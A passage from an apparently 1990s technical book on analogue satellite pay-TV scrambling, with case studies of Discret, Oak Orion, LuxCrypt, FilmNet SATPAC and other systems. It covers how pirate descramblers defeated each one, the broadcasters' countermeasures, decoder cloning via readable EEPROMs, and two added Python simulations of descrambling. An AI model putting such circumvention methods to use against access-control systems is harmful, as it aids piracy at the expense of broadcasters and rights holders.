baseband type. The RF type had its own tuner and remodulator. It was 
primarily intended for use with televisions that predated SCART sockets. 
The baseband descrambler would connect directly to the SCART connector 
on the television. The television's tuner/demodulator circuit would provide 
the descrambler with composite video and audio. The descrambler would 
descramble the signals and return the clear video and audio signals to the 
television. 


The video scrambling on the Discret system is known as "line delay". The 
active video section of each line is pseudo-randomly delayed by one of 
three delays; 0 nS, 902 nS or 1804 nS. This type of scrambling gives the 
video a very ragged look on the screen. The entertainment value of the 
picture is not totally destroyed. 


The audio scrambling used is "Spectrum Inversion". The audio spectrum is 
rotated about a carrier frequency. This makes the audio sound like Donald 
Duck on LSD. The lack of audio on the scrambled Discret signal destroys 
the entertainment value. 


The sequence of delays is not random but pseudo-random. It repeats after 
six fields. The official descrambler required the customer to type in a pass 
number. For the first month, any number would work. After that, the 
customer's own pass number would only work on his own descrambler. The 
"Radio Plans" design did away with all of that complexity. Of course the 
simplicity of the "Radio Plans" circuit made it easy for Canal Plus to 
counter. 


The rise from black level to the start of active video was detected. A time 
slot or window circuit was used to check where the active video started. 
Three slots were used. If the active video started in the first slot, then the 
video was not delayed. If it started in the second slot, the video was delayed 
by 902 nS. If the video started in the third slot, then the video was delayed 
by 1804 nS. 


The "Radio Plans" design ensured that all of the lines of video had 1804 nS 
delay. This was, in principle, a simple operation. If the video was not 
delayed, then it was passed through an 1804 nS delay. If the video was 
delayed by 902 nS, then the video was passed through a 902 nS delay. If 
the video was delayed by 1804 nS, then it was passed without introducing 
any delay. 
The main problem of descrambling the signal lay in delaying the video. A 
simple solution was found. A colour transient improver IC, the TDA4560, 
was used. This IC had a gyrator delay line that could provide an 888 nS 
delay. Two of these ICs were used in the design. The IC naturally became 
difficult to obtain. Glass delay lines and even LC delay lines were tried. 


The method of operation of the “Radio Plans” design made it easy to defeat. 
Canal Plus injected a level other than black into the delay area. This fooled 
the start of video detector circuit into thinking that the video was not 
delayed. As the expertise of Canal Plus grew so did that of the hackers. 


The fixed level modification to the system was easily overcome by the 
hackers. Since the level of the signal injected into the delay area was 
constant, a comparator circuit was used to detect it. An EXOR logic gate 
was then used to check if it was a flat level such as black, grey or white. Of 
course the addition of a noise burst instead of a level fooled the comparator 
circuitry. 


Some hackers departed from the “Radio Plans” design and developed 
microprocessor based descramblers. These descramblers detected the 
start and end of the six field sequence. When the sequence changed each 
month, the microprocessor would “learn” the new sequence. This is the 
format that many of the pirate descramblers now use. Even these 
descramblers now have a limited lifespan. 


One ECM that hit most of the microcontroller based descramblers was the 
“False Flag” ECM. The following explanation is a simplified one. The end of 
a sequence is clearly flagged in a Discret signal. The descramblers used 
this to lock or initialise their “learn” routines. 


Under ordinary circumstances, the sequence was six fields in length. A 
sequence flag should therefore appear every six fields. A false flag is where 
the end of sequence flag appears when it shouldn't. This caused the pirate 
descrambler to initialise when there was no need to. The sequence length 
was also changed. 


Hacker Descrambler Operation 


The video signal is passed through three buffer amplifiers, two delay lines 
and a multiplexer. A smattering of logic circuitry is used to preserve the 
synch signals and the color burst. The video signal is also fed to the start of 
video detector. This circuit detects the rise from black level at the start of the 
video information. The output of this circuit is fed to a logic circuit called the 
delay detector. By using a series of monostables triggered by the line synch 
pulse, the delay is checked by determining the period in which the video 
starts. The period of each monostable is 902 nS. The output from this circuit 
controls the multiplexer. If the signal has zero delay, then it is fed through 
the two delay lines. If the signal has a one unit delay, (902 nS), then it is fed 
through one delay line. If the signal has two unit delay then it is fed straight 
to the multiplexer. The descrambler ensures that all the lines have a two unit 
delay. This produces a black line at the left hand margin of each frame, 
though it is generally lost in the overscan with most televisions. 


The "Radio Plans" descrambler has an inherent weakness in that it relies on 
the detection of the rise from black level to start of video in each line. If the 
delay was filled with a level other than black, then the "Radio Plans" 
descrambler would not work. This is precisely what Canal Plus did in an 
early ECM. 
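An added simulation in Python of the line delay, the start of video detector, 
the fill-level ECM and the sequence learning descrambler described above; it 
is not the "Radio Plans" design or any pirate's firmware. One sample stands 
for 902 nS so the three delays are 0, 1 and 2 samples; sync pulses and colour 
burst are not modelled, and the picture content, line and field sizes and the 
delay sequence are constructed from seeded random numbers. 

```python
# Simulation of Discret 1 line delay and the descrambling strategies in the
# text. Added illustration, not the Radio Plans or any pirate design. One
# sample stands for 902 nS, so the three delays are 0, 1 and 2 samples;
# sync pulses and colour burst are not modelled, the picture content and the
# delay sequence are constructed from seeded random numbers, and line and
# field sizes are assumed.
import random

UNIT_DELAYS = (0, 1, 2)            # 0 nS, 902 nS, 1804 nS
BLANK = 8                          # samples from line start to nominal start of video
ACTIVE = 48                        # active video samples per line
LINE = BLANK + ACTIVE + 2          # fixed line length, room for the largest delay
BLACK = 0
CYCLE = 6 * 12                     # six fields of twelve lines per delay sequence


def delay_sequence(seed):
    """Pseudo-random delay per line; the sequence repeats every six fields."""
    rng = random.Random(seed)
    return [rng.choice(UNIT_DELAYS) for _ in range(CYCLE)]


def scramble_line(active, delay, fill=None):
    """Shift the active video right by `delay`; the vacated gap is black
    unless an ECM supplies another level (`fill` is called per sample)."""
    gap = [BLACK if fill is None else fill() for _ in range(BLANK + delay)]
    return gap + active + [BLACK] * (2 - delay)


def detect_rise_from_black(line, threshold=16):
    """Radio Plans: the first sample above black marks the start of video."""
    for i, v in enumerate(line):
        if v > threshold:
            return i - BLANK
    return None


def detect_flat_level(line):
    """Later designs: the gap is a flat level (black, grey or white), so video
    starts where consecutive samples first differ. Noise in the gap defeats it."""
    for i in range(1, len(line)):
        if line[i] != line[i - 1]:
            return i - BLANK
    return None


def realign(line, delay):
    """Give every line the two unit delay: pad on the left, trim on the right.
    A detector result outside 0..2 is a miss and the line is left ragged."""
    if delay not in UNIT_DELAYS:
        return line
    extra = 2 - delay
    return [BLACK] * extra + line[:LINE - extra]


def active_video(line):
    return line[BLANK + 2:BLANK + 2 + ACTIVE]


def broadcast(seed=7, fill=None, content_seed=1):
    """One six-field cycle of (clear active video, scrambled line) pairs."""
    rng = random.Random(content_seed)
    for delay in delay_sequence(seed):
        active = [rng.randrange(32, 224) for _ in range(ACTIVE)]
        yield active, scramble_line(active, delay, fill)


def recovered(pairs, delays):
    """Fraction of lines whose active video ends up where it belongs."""
    pairs = list(pairs)
    hits = sum(active_video(realign(line, d)) == active
               for (active, line), d in zip(pairs, delays))
    return hits / len(pairs)


def run_detector(detector, **kw):
    """Descramble a cycle line by line from the detector's output."""
    pairs = list(broadcast(**kw))
    return recovered(pairs, [detector(line) for _, line in pairs])


def learn(detector, **kw):
    """Microprocessor design: record the detector's output over one cycle and
    replay it afterwards, whatever the broadcaster puts in the gap."""
    return [detector(line) for _, line in broadcast(**kw)]


if __name__ == "__main__":
    grey = lambda: 240
    print(run_detector(detect_rise_from_black), run_detector(detect_rise_from_black, fill=grey))
    print(run_detector(detect_flat_level, fill=grey))
    noise = random.Random(3)
    print(recovered(broadcast(fill=lambda: noise.randrange(256)), learn(detect_flat_level)))
```

Each ECM in the text has its counterpart here: a grey fill blinds the rise 
from black detector, a noise fill blinds the flat level detector, and neither 
touches a descrambler that has already learned the six field sequence; only a 
change of sequence does. 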


Other Information 


The Discret 12 system is a digital based system. The video has to be 
digitised in order to scramble and unscramble it. The delays are introduced 
into the digitised video using digital shift registers. 


One of the more innovative pieces of circuitry in a hacker design digitised 
the first few microseconds of each line and used the digitised information to 
detect a delay. The pre start of video section of each line is sampled a 
number of times. The width of each sample corresponds to the smallest 
delay time. If the byte does not correspond to the converted equivalent for 
black level, usually 00000000 binary, the video has started. This is checked 
using an eight input NAND gate. There are two ways in which the 
descrambler can clock out the digitised video. The existing line can be 
delayed to match up with the most delayed line as in the Discret 1 
descrambler or the video can be delayed until what would be the next line 
period and then clocked out and converted to analogue at the correct time. 
While the detection method above is reliable, it was not widely used on the 
majority of the Discret descramblers. 


The Discret system is inherently insecure and most of the upgrades have 
been hacked within a very short time. The most common upgrade is to 
change the sequence of the delays and fill the delays with non-black levels. 
The main problem that the system faces is that the pirate descramblers are 
“clever” in that they can ascertain the delay sequence. 


In Ireland, Cablelink actually used this system for a while. They did not like it 
and found it unreliable. The descramblers that they were supplied with 
appeared to be models converted from the original French types. 


Given that Canal Plus in France is dumping this system, there will be a lot of 
second hand descramblers on the market. The low prices of this equipment 
will inevitably make the system attractive to cash poor cablenets. However it 
would be downright stupid for anyone to use this system given the available 
hacker knowledge and expertise that is available. 


There are rumours that a few of the MMDS franchises in Ireland are 
considering adopting Discret. The rationale being that there is a strong legal 
framework to protect them. This over reliance on legal safeguards is both 
stupid and dangerous. While the system might initially protect the franchise 
from hacking, it is a liability when considered in a long term light. 


The most dangerous aspect of the Discret decoder is that the critical 
addressing data is held in an EEPROM that can easily be read. The 
programs to read the EEPROM are commonly available on BBSes and the 
Internet. It is not exactly a difficult task. 


The flaw of unprotected critical data was common in systems designed in 
the early eighties. Once the contents of the EEPROM can be copied, it is 
possible to create a set of cloned decoders merely by reprogramming 
other official decoders with the same data. Naturally the programme 
provider could find out about the clone master and knock the clone network 
out. 


Case Study: The OAK Orion System 


Video Scrambling: Horizontal and vertical synch 
replacement, random or sequential field or line inversion. 


The usual horizontal and vertical synch pulses are removed from the 
scrambled video and replaced with 2.5 MHz bursts. The video on each line 
can be inverted or normal polarity. A pulse situated just before the start of 
video in each line indicates the polarity of the video. The inversion can take 
place on a line, field or frame basis. 


Audio Scrambling: Digital audio with encryption facilities. 


The audio is digitised and compressed. The digital audio samples are then 
inserted into what would normally be the horizontal blanking interval. 


Users: Sky Channel. (1982-1987) 


The Orion of Oak-Orion stands for Oak Restricted Information and 
Operation Network. The Oak-Orion scrambling system is a lot more secure 
than most hackers seem to think. In Europe, SKY has been the only satellite 
service to use this system. The minimum security level has been used for 
this application as SKY was not really a PAY-TV station in the true sense. 
The audio facility on the waveform was not used on SKY as monophonic 
and stereo subcarriers were transmitted with the signal. 
Six possible inversion modes can be used in the system. One of four video 
inversion modes can be used during each field; inversion on odd lines, 
inversion on even lines, all inverted or no inversion. The control sequence 
for this option is to be found in line twenty-two. The Oak-Orion system is 
patented and the original patent application, (No: US 4353088), also 
includes two further options. The voltage level of the digital packet in each 
line could be shifted or alternatively it could be varied by a sinewave gated 
to vary the levels in the horizontal blanking period. 


Variants of the system are still in use. It is however being replaced by more 
secure systems. As it dated from the early eighties, the system was 
remarkable for the amount of security it offered. It was let down by the fact 
that it could be hacked by replacing an EPROM. 


Hacker Descrambler Operation: 


The simplest hacker descramblers detect the 2.5 MHz synch bursts and 
use a number of monostables to recreate the line and frame synch signals. 


The average hacker descrambler consists of the following blocks; an 
inverting video amplifier, a 2.5 MHz synch burst detector, schmitt trigger 
inverters, line synch monostables, an integrator, a frame synch monostable 
and a synch re-insertion circuit. A number of circuits can be used for the 2.5 
MHz synch burst detection. These can vary from a diode detector to a video 
demodulator IC operating at 2.5 MHz. The synch re-insertion circuit can 
either be a CMOS switch type or a transistorised type. 


Every line has an inversion bit preceding the video information. If the 
inversion facilities were ever to be used, then the hacker decoder would 
have to sample this bit and use a multiplexer prior to the synch re-insertion 
circuit to switch between positive and negative polarity video. 


A descrambler for this system is covered in the Pink And Brown Book. It is a 
very elaborate method of descrambling the signal. A generic descrambler or 
synch generator Unfortunately this system is no longer in use on satellite 
links in Europe. It would have been easy for Sky to have defeated the 
hackers by introducing another level to the systems as the hacker 
descramblers that were used were crude and simple in design. 


There is no information in Europe to suggest that the digital audio was 
hacked. The primary reason for this non-event was the availability of an 
unscrambled audio subcarrier. Elektor Electronics magazine published a 
video descrambler design for ORION in early 1987. The timing was 
unfortunate as Sky dropped the ORION system shortly after the article was 
published. 
Typical Hacker Descrambler Block Diagram 

Case Study: The LuxCrypt System 


Video Scrambling: Horizontal and vertical synch 
replacement, random or sequential field or line inversion. 


The usual horizontal and vertical synch pulses are removed from the video 
and replaced with 5.72 MHz bursts. The video on each line can be inverted 
or normal polarity. The inversion can take place on a line, field or frame 
basis. 


Audio Scrambling: Digital audio (unused). 


The audio is digitised and compressed. The digital audio samples are then 
inserted into what would normally be the horizontal blanking interval. Only 
two bytes of the three byte data burst are used for digital audio. The other 
byte is used for synch information and perhaps line polarity information. 
This digital audio facility is not used in the LuxCrypt implementation. 


Users: RTL4-V 


This system is in some ways similar to the forerunner of the ORION system. 
The primary difference between LuxCrypt as used on RTL4-V and ORION is 
that the synch bursts are at 5.72 MHz rather than 2.5 MHz. This means that 
a pirate ORION descrambler will not work on this system without 
modification. 


The primary reason for the use of this system by RTL4-V is copyright. 
RTL4-V does not have European copyright for some of the programmes 
shown on the channel. 


The video inversion can be based on the amount of white or black in the 
scene. This type of inversion is keyed to the average picture level or APL, 
pronounced "apple". These inversions take place on a three second basis. 


The APL inversion was introduced in January 1990. The effect on the 
pirates was significant. Many of the commercial pirates had completed their 
designs and were oblivious to the fact that the APL inversion facility existed. 
Many were getting ready to ship their completed descramblers to waiting 
customers when RTL-V struck with the upgrade. This turn of events added 
at least another month to delivery dates. 


RTL4-V uses polarity inversion on a random basis. To date this has only 
been on a field basis rather than a line basis. The aim is to upset the simpler 
decoder designs. Most of the RTL4-V pirate descramblers are not affected 
as they are actual clones of the official model. 
Hacker Descrambler Operation: 


The simplest hacker descramblers detect the 5.72 MHz synch bursts and 
use a number of monostables to recreate the line and frame synch signals. 
Other versions detect the color burst in each line and count the number of 
color bursts to trigger the field pulses. 


The average hacker descrambler consists of the following blocks; a video 
amplifier, a 5.72 MHz synch burst detector, schmitt trigger inverters, line 
synch monostables, an integrator, a frame synch monostable and a synch 
re-insertion circuit. A number of circuits can be used for the 5.72 MHz synch 
burst detection. These can vary from a diode detector to a video 
demodulator IC operating at 5.72 MHz. The synch re-insertion circuit can 
either be a CMOS switch type or a transistorised type. 
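The burst detector and sync regeneration common to the ORION and LuxCrypt 
hacker descramblers described above, as an added Python example; it is not 
a published design. A sliding correlator at the burst frequency stands in for 
the diode detector or demodulator IC, and a hold-off for the retriggerable 
monostables and integrator; the sample rate, burst amplitude, the burst widths 
taken to represent line and field sync, and the video content are all 
assumed. 

```python
# Sync burst detection as used by the pirate descramblers for Oak Orion
# (2.5 MHz bursts) and LuxCrypt (5.72 MHz bursts). Added illustration, not a
# published design: a sliding correlator at the burst frequency stands in
# for the diode detector or demodulator IC, and the run-length logic for the
# monostables and integrator. Sample rate, burst amplitude, the burst widths
# standing in for H and V sync, and the video content are all assumed.
import math

FS = 20_000_000        # samples per second (50 nS), assumed
LINE_US = 64.0
H_BURST_US = 4.7       # burst replacing the line sync pulse, assumed equal in width
V_BURST_US = 27.0      # longer burst in the vertical interval, assumed
WINDOW = 32            # correlator length in samples
THRESHOLD = 10.0       # on c^2 + s^2; a full-window burst at 0.3 V gives about 23


def samples(microseconds):
    return int(round(microseconds * FS / 1e6))


def make_line(burst_hz, start_us=1.5, burst_us=H_BURST_US, amp=0.3, seed=1):
    """One scrambled line: flat video steps of up to 0.5 V, with the burst
    written over the sync slot. The video is constructed from a small LCG."""
    n, line, level = samples(LINE_US), [], 0.0
    for i in range(n):
        if i % 40 == 0:
            seed = (seed * 1103515245 + 12345) & 0x7FFFFFFF
            level = 0.5 * ((seed >> 16) & 0xFF) / 255
        line.append(level)
    for i in range(samples(start_us), samples(start_us + burst_us)):
        line[i] = amp * math.cos(2 * math.pi * burst_hz * i / FS)
    return line


def burst_energy(x, burst_hz, start):
    """Correlate one window with sine and cosine at the burst frequency."""
    c = s = 0.0
    for k in range(start, start + WINDOW):
        ang = 2 * math.pi * burst_hz * k / FS
        c += x[k] * math.cos(ang)
        s += x[k] * math.sin(ang)
    return c * c + s * s


def find_bursts(x, burst_hz, holdoff=WINDOW):
    """(start, length) of each burst: a run of hot windows, bridging gaps
    shorter than `holdoff` the way a retriggerable monostable would."""
    runs, start, last_hot = [], None, None
    for i in range(len(x) - WINDOW + 1):
        if burst_energy(x, burst_hz, i) > THRESHOLD:
            if start is None:
                start = i
            last_hot = i
        elif start is not None and i - last_hot > holdoff:
            runs.append((start, last_hot + 1 - start))
            start = None
    if start is not None:
        runs.append((start, last_hot + 1 - start))
    return runs


def regenerate_sync(x, burst_hz):
    """Replace each burst with a negative-going sync pulse; a run longer than
    half the vertical burst is classed as vertical sync. Returns the repaired
    line and a list of (kind, sample index) for the pulses inserted."""
    out, pulses = list(x), []
    for start, length in find_bursts(x, burst_hz):
        kind = "V" if length > samples(V_BURST_US) / 2 else "H"
        for i in range(start, min(start + length + WINDOW, len(out))):
            out[i] = -0.3
        pulses.append((kind, start))
    return out, pulses


if __name__ == "__main__":
    for hz in (2_500_000, 5_720_000):
        print(hz, regenerate_sync(make_line(hz), hz)[1])
```

The same code serves both systems with nothing but the burst frequency 
changed, which is the point the text makes about converting an ORION 
descrambler for LuxCrypt: the marker that replaces the sync is as easy to 
find as the sync it replaced. 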


To hack the inversion facilities the hacker decoder would have to sample 
the white level - black level line in the Vertical Interval Test Signals. The 
condition of this line would indicate the polarity of the field. The polarity 
sample is then used to control a multiplexer which switches between 
positive and negative polarity video prior to the synch re-insertion circuit. 


This can be defeated by the use of a byte of the digital information to control 
a line based inversion. This is possible though it is unknown if this option will 
be used on the RTL-V implementation. 


Apparently this system has been adopted by RTL5 though this implementa- 
tion uses APL. As a result some of the old pirate designs do not work. 
However the XV2000 design has been reported as still working. 


2: The Principles Of Security 


Case Study: Sound In Synch - EBU Format 


Video Scrambling: Digital Sound In H. Synch 


The video in the EBU sound in synchs system is not actually scrambled. 
Because the digital audio is inserted into the horizontal blanking interval, the 
synch stripper in the television can be confused. The picture appears 
ragged and at times can lose line stability. 


Audio Scrambling: PCM With Crypto 


The audio in this system is digitised and encrypted. In some cases the audio 
is unencrypted but a digital demodulator is required. 


Users: European Broadcasting Union 


The EBU format system is designed to optimise the satellite power. On a 
normal satellite transmission, the audio is transmitted on a subcarrier in the 
range 5 MHz to 8 MHz. This consumes some of the available power. The 
EBU system economises by putting the audio in the video waveform. This 
means that the EBU transmission format is essentially only a video 
waveform. As a result, the power that would have been used for an audio 
subcarrier can now be used for the video. This gives a better CNR. 


There are rumours that the EBU are considering a switch to Nagra Kudelski 
Syster. The aim of this is to stop the piracy of the signals. Of course these 
rumours have been floating around for about six years now and nothing has 
really happened. 


Hacker Descrambler Operation: 


There is not a great demand for hacker descramblers for this system. A 
combined video descrambler - audio decoder was developed by a Dutch 
firm and marketed within the last two years. 


The video on the other hand is easily hacked. It merely involves replacing 
the horizontal synch pulse area in the scrambled signal with a new properly 
timed horizontal synch pulse. 
Case Study: Standard Electric Lorentz PCM2 


Video Scrambling: Shortened H. Synch Pulse 


The video in the SEL system is not actually scrambled. The horizontal synch 
pulse is shortened from 4.7 uS to approximately 1 uS. This causes the 
television synch circuitry to lose line lock. The frame pulses are untouched 
and as a result, the picture may lock vertically but it will not have total 
horizontal lock. 


Audio Scrambling: Digital Audio. 


One audio packet is placed after the shortened horizontal synch pulse. The 
other audio packet is placed after the color burst. 


Users: Defunct 


The SEL PCM2 system has two main differences from the EBU system. 
The digital audio is placed in the line blanking interval at two points; one 
packet before the color burst and one packet after the color burst. When the 
system was in use in Europe, the second packet was rarely used. The 
second difference was the use of a shortened line synch pulse. This pulse 
was shortened to approximately one microsecond. 


Hacker Descrambler Operation: 


The video section of the SEL PCM2 is relatively easy to descramble. The 
hacker descrambler uses the shortened horizontal synch pulse to trigger a 
properly dimensioned horizontal synch pulse. This new synch pulse is then 
inserted into the scrambled waveform in place of the shortened synch pulse. 


A standard synch stripper can be used. The stripped synch is fed to a 
monostable set to give a 4.7 uS pulse. The 1 uS synch pulse is also used to 
trigger a set of gating monostables to gate the digital audio to the 
demodulator. The digital audio levels are between black level and white 
level. This implies that the signal should be well clamped prior to 
descrambling. Sometimes if the clamp is badly designed, the shortened 
synch pulses can be damaged. 


At the present, the SEL PCM2 system is not being used in European 
satellite broadcasting. According to available information, the audio was not 
hacked. 
Case Study: The Old FilmNet System - SATPAC 


Video Scrambling: Synch Shifting. Sequential Field Video Inversion 


Audio Scrambling: Modified NICAM With Crypto 
Users: FilmNet Greece though otherwise defunct 


The Filmnet / SATPAC / Matsushita system was first used on Filmnet on 
01/Sept/1986. Up to that point in time, the channel was one of the most 
popular film channels available in the clear on satellite in Europe. As a result 
of the scrambling, the system became overnight the prime target for 
hackers in Europe. It could be argued that FilmNet was the channel that 
created the initial pan-European Blackbox industry. And the primary 
motivation of the viewer? FilmNet was transmitting porn that was 
unavailable in some countries in Europe. 


The SATPAC system is perhaps one of the best examples of what happens 
to a system originally designed as a cable television system when it is 
converted to satellite use. It was utterly gutted by hackers so much so that 
even the film providers were getting worried at the state of piracy on the 
channel. 


While this system has ceased operation on the main FilmNet satellite 
transmission on ASTRA, it has been spotted recently on another FilmNet 
feed to Greece. It seems that most systems like this are pressed into use on 
small operations sooner or later. It is still used on cablenets throughout 
Europe. 


The reason that this case study is still included in the Black Book is because 
it is a good illustration of an analogue satellite scrambling system being 
used on satellite. It is also a good example of why analogue scrambling 
systems on satellite are doomed to failure. 


The SATPAC system is old. It is from the same generation of systems as 
Payview and the cable based Jerrold Tri-Mode. Like these systems, it 
initially relied on interfering with the synch pulses and inverting the video. Of 
course the abject piracy on the analogue video scrambling aspect forced 
FilmNet to implement a digital audio encryption system as an add-on. It was 
of course a stupid path of action as a totally compromised system, 
especially one where there is analogue scrambling, has to be replaced. 


The scrambling technology of the early eighties was based on interfering 
with the synch section of the video line and inverting the video on a 
pseudo-random basis. The SATPAC was not that different from many of the 
systems of that era. It interfered with the polarity of the video and the level of 
the horizontal blanking intervals. 


The first level of Filmnet was employed from 01/Sept/1986 to 23/Mar/1987. 
The first phase was extremely simple to hack and there was a booming 
market in pirate or blackbox descramblers. The upgrade that occurred on 
23/March/1987 dented the market. It was an easy hack. The video in each 
alternate field was inverted. The effect on the pirate market was 
devastating. The upgrade went into operation a few days before one of the largest 
European satellite shows, Cable And Satellite 1987. This rendered many of 
the demonstration models useless. 


The Filmnet system was upgraded over Christmas 1989. The upgrade took 
place over a few days. The system was fully updated by 24/12/89. It was the 
worst possible Christmas present for pirate descrambler owners and 
manufacturers. Many of the pirates were working over the holiday period in 
order to get their stock upgraded. The impact of the upgrade was 
considerably less than that of March 1987. Many of the pirate descramblers 
were not eliminated. Those that were affected were quickly upgraded and 
the estimated effective lifetime of the upgrade is two weeks. Most pirates 
took advantage of the holiday period and as such had working 
descramblers ready for January 1990. 


At the end of January 1990, FilmNet switched back to the two field 
sequence with rather nasty effects for some pirate descrambler 
manufacturers. They had hardwired the descrambler upgrades for the four field 
sequence. The descramblers did not work after the downgrade. This 
produced a lot of angry customers who wanted their money back. Some 
pirate descrambler manufacturers were bankrupted as a result. 


It seems that FilmNet, in desperation, went for a digital audio system. What 
they did not seem to understand was that the Blackbox industry had 
reached such a size and level of expertise in Europe, that the digital audio 
system was inevitably going to be hacked. 


When FilmNet introduced their digital audio in 1991, it effectively nuked the 
market. It did not have the effect that FilmNet had hoped for. Instead of 
killing off every pirate manufacturer it only killed off the smaller firms. The 
larger firms concentrated on hacking the digital audio. Hi Tech actually had 
the FilmNet digital audio ASIC reverse engineered and after examining it 
created a new one. The Hi-Tech ASIC and decoder actually outperformed 
the official FilmNet digital audio decoder. 
Hacker Descrambler Operation: 


A number of methods were used by the hackers to descramble the FilmNet 
signal. The commonest were: synch recombination using triggered 
monostables, synch recombination using a PLL and synch regeneration. We will 
only use the triggered monostable design as an example. 


The first level that FilmNet used was an inverted line and suppressed 
horizontal blanking interval. 


The composite synch signal for the Filmnet system was transmitted on a 
carrier at 7.56 MHz. This carrier was demodulated using an FM 
demodulator typically based on the TBA120 chip. On cable versions of this system, 
this carrier is Amplitude Modulated on to the FM audio subcarrier. 


After demodulation, this composite synch signal is split into frame synch, 
(using an integrator), and line synch. The first two line monostables phase 
the line synch with the synch position in the scrambled video. 


A noise gate is used to detect the horizontal synch interval in the 
scrambled video. The output of the noise gate is ANDed with the phased 
line synch. This gives a correctly timed trigger line synch pulse. 


The trigger pulse is fed to two monostables. The first monostable delays 
the pulse by 52 uS. The delayed pulse is then used to trigger the second 
monostable. This monostable generates a pulse the approximate width of 
the horizontal blanking interval. This pulse is used to pull down or shift the 
horizontal blanking interval in the scrambled video back to the unscrambled 
level. 


Upgrade 1 - 23/03/1987 


This was the first time that FilmNet had used the field based inverted video 
option. The video was inverted in each alternate field. On most of the pirate 
descramblers, this simple upgrade was devastating. The PCBs and 
generally the over all circuitry of most of the pirate descramblers were not 
designed with this in mind. The information available on the system was, to 
say the least, iffy. 


The hacker response was to use a multiplexer to switch between the 
inverted video and normal video outputs of a differential output amplifier. 
The frame pulse was divided by two using a flip flop. This meant that the 
output of the flip flop changed polarity once every field. 


The actual flip from normal to inverse video did not take place at the exact 
end of one field. This meant that the frame pulse had to be slightly delayed 
by a monostable before being used to trigger the flip flop. 
Upgrade 2 - 24/12/1989 


The SATPAC system had more than one level of field inversion sequence. 
Most of the hackers had, in their eagerness to overcome the alternate field 
inversion, neglected to make their solution capable of handling anything 
other than an alternate field inversion. FilmNet exploited that weakness by 
going for a four field based inversion sequence. The fourth field was normal 
polarity and the other three fields were inverse polarity. The pattern could be 
produced using two flip flops and an AND gate. The first flip flop divided the 
50 Hz field frequency by two to give a 25 Hz square wave. The second flip 
flop divides the 25 Hz square wave by two to produce a 12.5 Hz square 
wave. The 25 Hz square wave and the 12.5 Hz square wave were ANDed. 
This produced a signal that went high on every fourth field. A NAND gate 
can also be used. 


FilmNet returned to the two field sequence in late January 1990. The aim of 
this upgrade was to cause maximum confusion among the pirates. It 
achieved that goal but by this time, most of the pirate descrambler designs 
had incorporated elements of polarity detection. This meant that the field 
inversion was no longer such a good option. 


Upgrade 3: 5/11/1990: 


Some of the pirate designs relied on measuring the voltage difference 
between the horizontal synch pulse tip and the blanking level to ascertain 
the polarity of the video. This was an exploitable weakness. 


FilmNet inserted a low level high frequency sine wave burst into the 
horizontal synch pulse tip. The frequency of the sine wave was approxi- 
mately that of the colour subcarrier. This had two consequences. It upset 
descramblers that used the colour burst to lock on. They saw two properly 
timed, (relative to one another), colour bursts. It also affected descramblers 
that determined the video polarity by comparing the level of the synch tip 
with the horizontal blanking level. 


This upgrade had the most widespread effect in the Blackbox industry. It 
was expected by some of the veteran manufacturers but some of their 
descramblers were mildly affected. It was generally a case of adding one or 
two components to the board as they had designed their descrambler with 
this upgrade in mind. The more recent additions to the industry were nearly 
obliterated by the upgrade - much to the amusement of the veteran pirates. 
Upgrade 4: December 1990: 


In December 1990, FilmNet started to vary the amplitude of the burst in the 
horizontal synch pulse by amplitude modulating the burst with a very low 
frequency, 1 Hz, wave. The logic behind this was clever. Most of the synch 
tip sampling descramblers had placed a very low value capacitor, typically 
100pF into the comparator circuit to filter out the burst in the synch tip. The 
low frequency would remain after the 100pF capacitor had filtered out the 
burst. This varying level would cause problems for the comparator as it was 
forced to interpret a signal as being inverted when it was actually normal 
polarity. 


Upgrade 5: January 1991: 


The first level of the SATPAC system is suppressed synch and no inversion. 
In January 1991 FilmNet switched off the inversion. This move, surprisingly, 
took out a few of the better pirate descramblers on the market. It did not 
affect the descrambling section of the descramblers but rather the 
autoswitching circuitry. Many of these descramblers used the inverted 
synch pulses in the scrambled video signal to trigger the descrambler into 
operation. Since there were no inverted synchs, the descrambler interpreted 
the signal as being clean. 


Upgrade 6: March 1991: 


By March 1991, the complexity of pirate descramblers was exceeding that 
of the official descramblers. The pirate designs were based on 
programmable logic arrays and other customisable chips. Most of these designs were 
colour burst lockers. They used the colour burst in the scrambled video to 
synchronise what effectively was a complete horizontal and vertical synch 
generator. 


In March 1991, a sequence of colour bursts was placed in the vertical 
synch. These prolonged bursts confused the burst counting circuitry in 
some of the colour burst locking descramblers. The result was that the burst 
counting pirate descramblers did not know where to put the vertical synch. 
This resulted in the picture rolling on the screen. Many of the descramblers 
on the market could be tweaked by the user to overcome the problem. 


Upgrade 7: March 1991 


While the previous upgrade was aimed at the more sophisticated pirate 
descramblers, a large section of the pirate descrambler market was still 
using designs that relied on the 7.56 MHz composite synch carrier 
transmitted by FilmNet. FilmNet's answer was the Double Glitch 
modification. 


The double glitch modification inserted a second pulse adjacent to each 
pulse. This was intended to unlock PLLs. The modifications generally 
involved disabling the pulse detection after the end of the first pulse. This 
was achieved with a monostable and multiplexing circuit. 


Upgrade 8: June 1991 


Digital audio was introduced. This was the end of an era. The pirate 
descrambler market created by the launch of ASTRA disappeared over the 
space of a year. Only Hi-Tech Extravision marketed a pirate digital audio 
decoder. 


Upgrade 9: September 1992 


FilmNet ceased PAL transmissions via ASTRA switching to D2-MAC 
EuroCrypt-M in the hope that it would solve all of their piracy problems. In 
the final reckoning, it was the worst move they ever made and they made 
some bad ones. 


Case Study: Telease MAAST / Sat-Tel SAVE 


Video Scrambling: Sine wave interference. Video inversion. Video amplitude reduction. 


The video in the scrambled signal is reduced by 3dB, (6dB in Europe), 
inverted and has an interfering sine wave added. The frequency of the sine 
wave is approximately six times the horizontal raster frequency, (15625 Hz x 
6 = 93750 Hz). 


Audio Scrambling: Spectrum Inversion. 


The carrier is derived from the frequency of the interfering sine wave. The 
sine wave frequency is divided by six to generate the carrier. 


The MAAST system was developed by Telease of California. It was 
manufactured and marketed in Europe by Sat-Tel, a now defunct UK 
company. The system is essentially a low security type. 


The system reduces the amplitude of the video signal, inverts it and adds a 
sine wave. The sine wave is close in frequency to the sixth harmonic of the 
line frequency. This ensures that any attempt to filter out the interfering sine 
wave and antiphase it with the scrambled video will leave a beat frequency 
patterning on the descrambled video. The reason for this is that the sixth 
harmonic of the line frequency is also pulled out by the filter. 


The level of video reduction differs. The US version reduces the video by 3 
dB and the European version reduces the video by 6 dB. This difference is 
primarily related to the transponder bandwidth. The US version typically 
operates in a 36 MHz bandwidth and the European version in a 30 MHz 
bandwidth. 


While the system has fallen into relative disuse in the US and Europe, the 
